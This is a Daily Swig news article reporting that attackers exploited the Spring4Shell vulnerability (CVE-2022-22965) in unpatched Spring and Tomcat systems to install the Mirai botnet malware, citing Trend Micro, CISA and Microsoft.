Attackers are abusing Spring4Shell vulnerability to spread Mirai botnet malware – The Daily Swig

Cyber Warfare
Russia is ‘failing’ in its mission to destabilize Ukraine’s networks
Hacker-powered security
Human error bugs increasingly making a splash, study indicates
In focus
Software supply chain attacks – everything you need to know
Special report
Inaugural report outlines strengths and weaknesses exposed by momentous security flaw
Chromium site isolation bypass
Flaw that opened the door to cookie modification and data theft resolved
Bug Bounty Radar
The latest programs for September 2022
Cybersecurity conferences
A schedule of events in 2022 and beyond
Spring is sprung
Attackers are abusing the #Spring4Shell vulnerability to distribute the Mirai botnet malware
Miscreants have started abusing the recently discovered Spring4Shell vulnerability as a vector for the spread of the Mirai botnet.
Trend Micro researchers have noticed the active exploitation of Spring4Shell – a critical vulnerability in VMWare’s Spring Framework’s Java-based Core module – to hack into unpatched devices before infecting them with the Mirai malware.
Exploitation began at the start of April in attacks focused on systems in Singapore, according to Trend Micro.
RELATED Spring4Shell: Microsoft, CISA warn of limited, in-the-wild exploitation
Abusing the Spring4Shell vulnerability (CVE-2022-22965) allows “threat actors to download the Mirai sample to the /tmp folder and execute them after permission change using chmod”, a blog post by Trend Micro explains.
The vulnerability can be used to trigger remote code execution in Spring Core applications under non-default circumstances. The security bug should not be confused with CVE-2022-22963 – a separate security vulnerability affecting the Spring Cloud Function.
Spring4Shell affects Spring Framework versions before 5.2.20, 5.3.18, and Java Development Kit (JDK) version 9 or higher. Apache Tomcat is also affected – the web server environment against which Trend Micro detected attacks against its clients’ systems.
Catch up with the latest security vulnerability news and analysis
As previously reported, the CVE-2022-22965 has also been identified in limited but in-the-wild exploitation, spurring warnings by both the US Cybersecurity and Infrastructure Security Agency and Microsoft’s Threat Intelligence Team. Microsoft said that the threat had cropped up in attacks against its cloud-based services.
Mirai is a strain of malware that turns networking devices running Linux into drones in a botnet network. The malware first surfaced in August 2016 and primarily affected hardware devices such as IP cameras and home routers.
It rose to prominence because of its subsequent abuse in several high-profile attacks, including a hugely disruptive attack against DNS provider Dyn in October 2016.
The Daily Swig asked Trend Micro a series of questions about the exploitation of Spring4Shell to spread Mirai. No word back as yet, but we’ll update this story as and when we hear more.

RELATED Spring4Shell: Spring users face new, zero-day vulnerability
John Leyden
@jleyden
Burp Suite
Vulnerabilities
Customers
Company
Insights
© 2022 PortSwigger Ltd.

source

Be the first to comment

Leave a Reply

Your email address will not be published.


*